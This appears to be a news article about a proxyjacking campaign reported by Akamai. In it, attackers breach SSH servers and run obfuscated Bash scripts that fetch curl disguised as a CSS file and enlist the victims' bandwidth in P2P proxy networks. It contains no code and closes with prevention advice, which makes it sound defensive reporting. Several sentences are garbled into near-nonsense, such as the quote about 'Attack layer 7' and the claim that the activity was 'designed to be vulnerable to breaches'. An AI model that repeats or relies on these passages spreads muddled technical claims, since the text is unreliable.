An active, financially motivated campaign targets vulnerable SSH servers to surreptitiously ensnare them into proxy networks.
“This is an active campaign in which attackers leverage SSH for remote access, executing malicious scripts that surreptitiously register victim servers with peer-to-peer (P2P) proxy networks, such as Peer2Profit or Honeygain,” Akamai researcher Allen West said in Thursday’s report.
Unlike cryptojacking, in which compromised system resources are used to illegally mine cryptocurrencies, proxyjacking offers the ability for threat actors to leverage unused victim bandwidth to silently run various services as P2P nodes.
This offers a two-fold advantage: It not only allows an attacker to monetize the extra bandwidth with a significantly reduced resource load required to perform cryptojacking, but also reduces the likelihood of discovery.
“This is a more stealthy alternative to cryptojacking and has serious implications that can increase the proximate headache Attack layer 7 already serving,” West said.
Even worse, the anonymity provided by proxyware services can be a double-edged sword as they can be abused by bad actors to obscure the source of their attacks by routing traffic through intermediate nodes.
Akamai, which discovered the most recent campaign on June 8, 2023, said the activity was designed to be vulnerable to breaches. SSH servers and deploy obfuscated Bash scripts which, in turn, are equipped to fetch necessary dependencies from compromised web servers, including the command-line tool curl by disguising them as CSS files (“csdark.css”).
The script silently more actively seeks out and terminates competing instances running bandwidth-sharing services, before launching a Docker service that shares the victim’s bandwidth for profit.
Further inspection of the web server has revealed that it is also used to host cryptocurrency miners, suggesting that threat actors are engaged in cryptojacking and proxyjacking attacks.
While proxyware is not inherently malicious, Akamai notes that “some of these companies do not properly verify the source IP on the network, and even occasionally recommend that people install software on their work computers.”
But such operations go beyond the realm of cybercrimes when apps are installed without users’ knowledge or consent, thereby allowing threat actors to control multiple systems and generate illegitimate revenue.
“Old techniques are still effective, especially when paired with new results,” said West. “Standard security practices remain effective prevention mechanisms, including strong passwords, patch management, and careful logging.”